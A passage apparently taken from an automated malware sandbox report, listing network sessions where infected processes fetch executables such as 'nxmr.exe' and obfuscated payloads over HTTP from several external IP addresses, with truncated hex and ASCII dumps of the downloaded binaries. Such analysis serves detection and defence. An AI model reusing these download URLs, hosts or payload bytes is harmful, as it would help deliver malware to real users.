                                                                                                                                                                                            Oct 26, 2024 07:27:09.917139053 CEST112INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                            Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>
                                                                                                                                                                                            Oct 26, 2024 07:27:09.917170048 CEST1236INData Raw: 9d ff ac 13 26 cb c9 21 3e dc d3 64 1f d4 fb 4b 2a 40 8a 9e 69 9c d7 88 b8 5b ba c3 f7 ae fa 88 5d de c1 ac aa e1 e0 7f f9 4c 06 c4 b9 fd f1 eb f2 cd ac 0e 84 7a 41 29 30 a1 85 dc 4e 24 80 77 81 7c 09 6e c7 f7 3d c9 cb d6 be 92 8b ff d2 c8 cc 02
                                                                                                                                                                                            Data Ascii: &!>dK*@i[]LzA)0N$w|n=29-BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            7192.168.2.649991185.215.113.84805112C:\Users\user\AppData\Local\Temp\1091722296.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:09.033567905 CEST177OUTGET /nxmr.exe HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.84
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950824022 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:09 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 5827584
                                                                                                                                                                                            Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f70fa2-58ec00"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950840950 CEST112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1
                                                                                                                                                                                            Data Ascii: Df.H(HuX1HvXHyX
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950856924 CEST1236INData Raw: c7 00 01 00 00 00 48 8b 05 ec b0 58 00 66 81 38 4d 5a 75 0f 48 63 50 3c 48 01 d0 81 38 50 45 00 00 74 66 48 8b 05 1f b1 58 00 89 0d a5 ef 58 00 8b 00 85 c0 75 43 b9 01 00 00 00 e8 01 71 01 00 e8 54 6b 01 00 48 8b 15 dd b1 58 00 8b 12 89 10 e8 54
                                                                                                                                                                                            Data Ascii: HXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p@Pft9fu{1iH1H(xtLD1E8@f.
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950912952 CEST1236INData Raw: 90 90 90 90 90 48 8d 0d 09 00 00 00 e9 d4 ff ff ff 0f 1f 40 00 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 8d 05 49 f8 58 00 48 8d 50 21 c6 00 00 48 83 c0 01 48 39 d0 75 f4 c3 48 8d 05 f1 f7 58 00 48 8d 50 18 66 c7 00 00 00 48 83 c0 02 48
                                                                                                                                                                                            Data Ascii: H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfHH9uHXHPNfHH9uHXHPfHH9uHNXHP$fHH9uHXHPfHH9u
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950962067 CEST424INData Raw: 00 00 80 0f 05 fd 48 8d 94 24 38 18 00 00 b9 00 00 00 00 e8 ea 41 00 00 e8 8f 36 00 00 89 c6 e8 1d 3e 00 00 48 89 c7 48 8b 40 20 48 8b 98 80 00 00 00 48 8d 8c 24 30 16 00 00 41 b8 08 02 00 00 ba 00 00 00 00 e8 ff 67 01 00 66 c7 84 24 50 01 00 00
                                                                                                                                                                                            Data Ascii: H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Zf$\f$^f$`f$bf$df$f=Xu<XHXDPfAHHu
                                                                                                                                                                                            Oct 26, 2024 07:27:09.950987101 CEST1148INData Raw: 00 00 96 00 66 c7 84 24 5c 01 00 00 9e 00 66 c7 84 24 5e 01 00 00 64 00 66 c7 84 24 60 01 00 00 63 00 66 c7 84 24 62 01 00 00 31 00 80 3d 5e f1 58 00 00 75 3c c6 05 71 f1 58 00 01 b8 00 00 00 00 48 8d 0d 51 f1 58 00 0f b7 94 44 50 01 00 00 66 89
                                                                                                                                                                                            Data Ascii: f$\f$^df$`cf$b1=^Xu<qXHQXDPfAHHu,XHo=5Xt)HXHJfof%fHH9uXH$0H$ LX%H$Aef$P_f$Rff$T
                                                                                                                                                                                            Oct 26, 2024 07:27:09.951030970 CEST1236INData Raw: c7 84 24 66 01 00 00 b2 00 66 c7 84 24 68 01 00 00 4d 00 80 3d 43 ec 58 00 00 75 3c c6 05 64 ec 58 00 01 b8 00 00 00 00 48 8d 0d 3e ec 58 00 0f b7 94 44 50 01 00 00 66 89 14 41 48 83 c0 01 48 83 f8 0d 75 ea c6 05 11 ec 58 00 01 48 8d 0d 5a f5 ff
                                                                                                                                                                                            Data Ascii: $ff$hM=CXu<dXH>XDPfAHHuXHZ=(Xt)HXHJfAf%fHH9uXH$ H$LX'!H$Agaf$Pf$Rf$Tf$Vf$Xf
                                                                                                                                                                                            Oct 26, 2024 07:27:09.951055050 CEST1236INData Raw: 58 00 01 b8 00 00 00 00 48 8d 0d 9a e6 58 00 0f b7 94 44 50 01 00 00 66 89 14 41 48 83 c0 01 48 83 f8 2d 75 ea c6 05 65 e6 58 00 01 48 8d 0d f5 f0 ff ff e8 e1 ef ff ff 80 3d c4 e6 58 00 00 74 29 48 8d 15 61 e6 58 00 48 8d 4a 5a 0f b7 02 66 2d cd
                                                                                                                                                                                            Data Ascii: XHXDPfAHH-ueXH=Xt)HaXHJZf-Jf%fHH9uXf$P"f$R f$Tf$Vf$Xf$Zf$\f$^f$`f$bf$df$ff$h=X
                                                                                                                                                                                            Oct 26, 2024 07:27:09.951085091 CEST224INData Raw: c7 84 24 5a 01 00 00 55 00 66 c7 84 24 5c 01 00 00 4e 00 66 c7 84 24 5e 01 00 00 45 00 66 c7 84 24 60 01 00 00 35 00 66 c7 84 24 62 01 00 00 52 00 66 c7 84 24 64 01 00 00 4b 00 66 c7 84 24 66 01 00 00 5c 00 66 c7 84 24 68 01 00 00 45 00 66 c7 84
                                                                                                                                                                                            Data Ascii: $ZUf$\Nf$^Ef$`5f$bRf$dKf$f\f$hEf$j=}Xu<XHpXDPfAHHuKXH=\Xt)H7XHJf-lf%fHH9u1Xf$P*f$R
                                                                                                                                                                                            Oct 26, 2024 07:27:09.951100111 CEST1236INData Raw: 00 00 39 00 66 c7 84 24 54 01 00 00 39 00 66 c7 84 24 56 01 00 00 2d 00 66 c7 84 24 58 01 00 00 2a 00 66 c7 84 24 5a 01 00 00 3d 00 66 c7 84 24 5c 01 00 00 2a 00 66 c7 84 24 5e 01 00 00 26 00 66 c7 84 24 60 01 00 00 e9 00 80 3d d4 d9 58 00 00 75
                                                                                                                                                                                            Data Ascii: 9f$T9f$V-f$X*f$Z=f$\*f$^&f$`=Xu<XHXDPfAHHuXH=Xt)HXHJf-lf%fHH9uXHmXHHH$L#X^f$Pf
                                                                                                                                                                                            Oct 26, 2024 07:27:09.956573963 CEST1236INData Raw: 58 00 48 8d 4a 12 0f b7 02 66 2d dd 0c 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 5f d4 58 00 00 48 8d 8c 24 50 01 00 00 41 b8 24 03 00 00 48 8d 15 c8 64 58 00 e8 83 52 01 00 80 3d e4 d0 58 00 00 75 3e c6 05 17 d4 58 00 01 b8 00 00 00
                                                                                                                                                                                            Data Ascii: XHJf-f%fHH9u_XH$PA$HdXR=Xu>XHXDPfAHH=uXH`=Xt,HXH$f-f%fHH9uX%XHXLXH=,Xu>3Xf"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            8192.168.2.649994185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:10.930785894 CEST166OUTGET /5 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:27:11.869988918 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:11 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 13568
                                                                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 12:10:16 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "67179628-3500"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 0c 11 18 17 3d 7f 82 02 a6 24 36 4b 11 62 4d 55 d2 81 18 a8 7b ac b4 99 13 ea 95 14 cc 97 97 e2 0a 71 67 8a f6 90 c5 ca 7a 7b 56 bb fa e8 89 09 55 1a 05 57 8f 9c 1a 81 d8 bb 44 82 88 57 06 b0 a8 b1 0d 7d 50 5d 73 d2 54 4b d9 0b b0 cd a7 15 33 5a 57 25 7a d1 92 b0 cc 68 22 98 ff fd 1b 98 b0 f5 65 52 62 23 6d 48 84 63 2c a5 ce 1c d7 7e 20 81 7c 51 12 ee 07 70 82 1e bb bd 5b c1 57 cc 9f 3b 07 de 21 89 69 22 52 a2 b3 ac 41 42 e4 9f 74 46 e4 c5 ff 6a 73 b7 e0 c8 5f 4b 1f cc 28 e3 35 c9 6a 94 90 c9 95 c3 85 52 2c ae 57 13 b6 c7 b3 65 41 44 cb 6e cf 7e 5a 38 88 3a 70 d6 16 06 5e 35 43 a9 4c 56 d1 91 19 cf 12 60 0e f4 0e 93 ce ed f1 59 ab 0f ac b8 08 db 75 8f 57 bd 3e 74 90 a5 b5 79 a1 e7 5c 27 4a 05 b2 04 bb fc f0 de 98 12 16 00 a4 94 30 c4 34 a7 3f 3d d1 48 9d 54 69 63 38 91 b3 31 0e e5 1c 1b 3b 56 e3 53 a0 7c af cd 1f e8 b5 94 ca 54 f5 68 9c e2 81 d7 79 54 fc 2b 6d ba e7 01 91 17 71 86 42 4c 6b dd ff 4f a6 b4 df 21 b1 1d aa 7b 15 e2 4c ad c1 62 52 91 b1 1e ba e8 86 3c 96 57 ad 50 ef 4f 07 df 8e c3 28 72 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: =$6KbMU{qgz{VUWDW}P]sTK3ZW%zh"eRb#mHc,~ |Qp[W;!i"RABtFjs_K(5jR,WeADn~Z8:p^5CLV`YuW>ty\'J04?=HTic81;VS|ThyT+mqBLkO!{LbR<WPO(rVc=Tb''+DZE"rJ:h}nw1~z:/;fwH`^D|%F8MD)A_uhi\:h%~!a>&cbV)g$V]Bg1v@%<+({Ps?'f#[V>%}sKu~gWA09-#98wSKfvZgi<)X>rRj9[t6'G*\3+veYh_9^H-'BIh=M8Nz-nt>+yJMpWPLkPyW"y~&ecMz6sC!J`mS?2"OR]N xcxkit9f#:a#C"Ql0p{{rtE:r:'lL]!poXAdOq'Fa|yM{x;!++H.}bpp8h;qLLa<x<j
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870002985 CEST212INData Raw: c5 f6 81 b2 5c be 3a f2 f4 a0 69 51 cb 1e 7a 65 63 1b 5e ad 0c 1e cb bc 15 0c c8 3c fd 96 62 f2 d2 3b 0a d0 1e 9d 66 0c cb 26 ef d1 f3 6e 2b c7 40 85 15 6d 0d 88 4b f9 89 10 2c 37 76 33 d6 5d a0 0a 79 c4 65 0a bc ad 27 98 0e b2 33 fc 54 5c f2 dd
                                                                                                                                                                                            Data Ascii: \:iQzec^<b;f&n+@mK,7v3]ye'3T\*Sk}):rN]WO]1G>&!>dK*@i[]LzA)0N$w|n=29-
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870024920 CEST1236INData Raw: 42 fc 42 df b7 b7 f3 29 e3 7b d1 26 5a c7 49 32 0d 65 8a a5 6a f7 e4 d5 60 20 91 d3 74 10 ce 33 ff bd 7e 25 e2 51 42 fe 63 3d e9 32 f2 e4 5d 93 5c 4b 7f 04 99 cb 1a 85 1b ed c7 1d 1c eb 11 d6 36 d8 c2 11 57 e8 d6 f2 aa 71 3e c5 d7 b1 1c f4 a2 a0
                                                                                                                                                                                            Data Ascii: BB){&ZI2ej` t3~%QBc=2]\K6Wq>d?H4$*e[ist;0BeO#IeShA+< .Gw9`KCcv^21p P2_ri~,T31;TF^hT\t})tm
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870040894 CEST1236INData Raw: d5 8b a3 e0 ec 72 b0 ed a3 3a 73 e3 ac 27 8b 18 ae bb 5d 87 aa b3 db 40 94 0e 2d 3a 4e fb 12 dd 3d f2 dd d2 dd a3 72 80 4d 76 81 af 56 a9 06 82 ae ff 8a 79 49 37 1c a2 b7 3a 25 ed f2 08 ab 4d 8e dd 95 b1 5a 7d 61 fb d3 0b d2 02 20 1c 85 9c e0 7f
                                                                                                                                                                                            Data Ascii: r:s']@-:N=rMvVyI7:%MZ}a OaYrPQ;|<5c0aFh){B9hT-|`56el/9uLltfDO|CVi-|R)
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870055914 CEST1236INData Raw: 6d 04 43 b9 79 60 4f 47 2a b3 06 4b 9f 7a be d0 c0 38 dc 6c 17 43 1e 74 6c 00 69 b0 8d 22 0a 73 79 98 ca 5f 43 59 c7 44 73 8d 02 a0 d3 49 7e 61 8a bd dc b0 82 db 37 0b 45 a1 57 3c 51 92 f5 a2 fc aa c2 9b 3a 89 7a e3 e8 0c cd c5 9c 06 84 c4 a4 02
                                                                                                                                                                                            Data Ascii: mCy`OG*Kz8lCtli"sy_CYDsI~a7EW<Q:z\,2`+tpk@T-#_DswpTn[/Ar"6k=G]5-[<FMBL]T"vV@#>:LkEIBIqI("
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870070934 CEST636INData Raw: 1d e8 10 4a fe b7 ee d7 2e e9 d1 70 53 ec 08 6d 77 87 ce ab f8 b4 8d 12 03 c2 d0 fc 32 58 ac ae c2 7d a6 ff 67 7c d6 bd 35 b0 14 41 eb 84 7f cc e3 42 77 6f 3d 2f e4 e7 77 5d a6 ee 11 a8 b8 42 97 f2 5a d3 93 6e e3 01 36 1e 1b d9 3d 8e 5a 07 fc 0e
                                                                                                                                                                                            Data Ascii: J.pSmw2X}g|5ABwo=/w]BZn6=Z!o{TVSz7[G8ZRb"wJ?is&w3M?8LBTa5Mr(*BDh)(l?ISrmXlv YF{R`[Rxi`Zi
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870107889 CEST1236INData Raw: 93 a1 90 ab 37 af 30 7f 48 18 06 1f 15 b9 2e ec e8 73 01 f0 05 26 34 36 48 b8 61 0b 29 d3 5c 05 24 1e f7 c4 21 c4 ec b8 a7 ab fa 77 22 70 9d 28 d1 b8 34 4b a2 ad ab e6 02 38 6a d1 66 3d 75 3b 40 9b 87 af 83 1b 24 38 4d 6d 99 e1 e4 12 0e ca 6f 86
                                                                                                                                                                                            Data Ascii: 70H.s&46Ha)\$!w"p(4K8jf=u;@$8Mmo(J4k8G*ncP=-jE@kzU9:tPT'NrpwE"8(s:{-setq^Eb.|:zRQkF(6Y!i
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870132923 CEST212INData Raw: 23 d5 c5 54 a8 f5 25 5b fc e9 87 96 2a 8f aa 00 fa ea 1e 3c e7 39 43 a4 56 81 d8 64 8d a2 85 9a 3e 83 e2 80 07 f0 92 bc 55 e6 8c 6b 64 b6 ff 69 c8 9c d1 71 bb b7 42 09 2f dd 9a 62 67 57 5e 14 bf c2 32 b3 fc a6 27 d3 4e 8f 2b 0c cf 53 4e f0 d3 b4
                                                                                                                                                                                            Data Ascii: #T%[*<9CVd>UkdiqB/bgW^2'N+SN*8s67H_qigq~+3s3p}U,<iv!f]c;>,E,^_;S.~`25HW.sZL F
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870146036 CEST1236INData Raw: eb 3c 0e 75 09 3d eb d4 cb 44 50 f8 50 fd 65 4f 09 8b b9 60 0d 1b 91 a2 a6 71 fe 16 35 6a 38 5e 5d ac 8b 1e 29 2e 71 d2 f9 39 da 7b c7 6c 62 36 1e 33 f6 73 18 da 1f ca 05 bc 7c 4d cb 47 d0 bc 88 73 60 63 2a 46 45 1f 0e d4 ec 2f a3 dc b5 6b 1f 12
                                                                                                                                                                                            Data Ascii: <u=DPPeO`q5j8^]).q9{lb63s|MGs`c*FE/k5(/;"ELZf_7 {^EsloCdlU&~2o8GD~tO!.L%z6K(3S{} 5(SWakdlgj"9
                                                                                                                                                                                            Oct 26, 2024 07:27:11.870163918 CEST1236INData Raw: 31 0c 71 5b 1f 50 f7 13 05 db f7 99 2f bc c0 cb 1b a6 3f da e7 66 42 02 bb d4 31 8f b2 54 0f 8f 9f 65 9e cc 92 4e ef cb c4 ec b8 dd 57 2a 75 d8 17 db 5d 74 33 70 78 47 0d 46 b5 31 0c 2b 63 6b 17 b7 4d 35 1d 1c 0b e9 5c 4c 62 c1 a8 a9 4b 74 16 ba
                                                                                                                                                                                            Data Ascii: 1q[P/?fB1TeNW*u]t3pxGF1+ckM5\LbKt}ZWO^`.UNOhn?})UQn{3v@%<sBiMPk!( rWOsv</Es^Wi<x-vL-B'
                                                                                                                                                                                            Oct 26, 2024 07:27:11.875447035 CEST1236INData Raw: ac 1e 90 10 e7 1f 7a 1f 74 24 22 ff 32 0f f7 fd 62 56 2d 0a 00 f0 de 21 a4 ac 83 3f a6 b0 33 f8 77 4b 49 4e 42 a9 68 b3 bf f3 9d f3 87 d6 28 95 91 06 e7 a6 f6 05 6a 08 02 d8 53 c6 0b 8a fe ab c7 f0 c0 af aa b0 ca 14 a5 0d eb fe 2f a4 e1 b6 a5 62
                                                                                                                                                                                            Data Ascii: zt$"2bV-!?3wKINBh(jS/bXJ[&r*9kYP*nU0Oj@`@;nZkz;'MJJCXrVmFzHbBa-&TTHD'Y,Nikm07<G/p{gT`


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            9192.168.2.64999791.202.233.141806992C:\Users\user\AppData\Local\Temp\146916724.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:17.809063911 CEST182OUTGET /ALLBSTATAASASD HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:18.565994978 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:18 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            10192.168.2.64999891.202.233.141801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:27:19.313267946 CEST166OUTGET /1 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:20.277121067 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:20 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                            Oct 26, 2024 07:27:22.346453905 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 91.202.233.141
                                                                                                                                                                                            Oct 26, 2024 07:27:22.645297050 CEST728INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:27:22 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 564
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
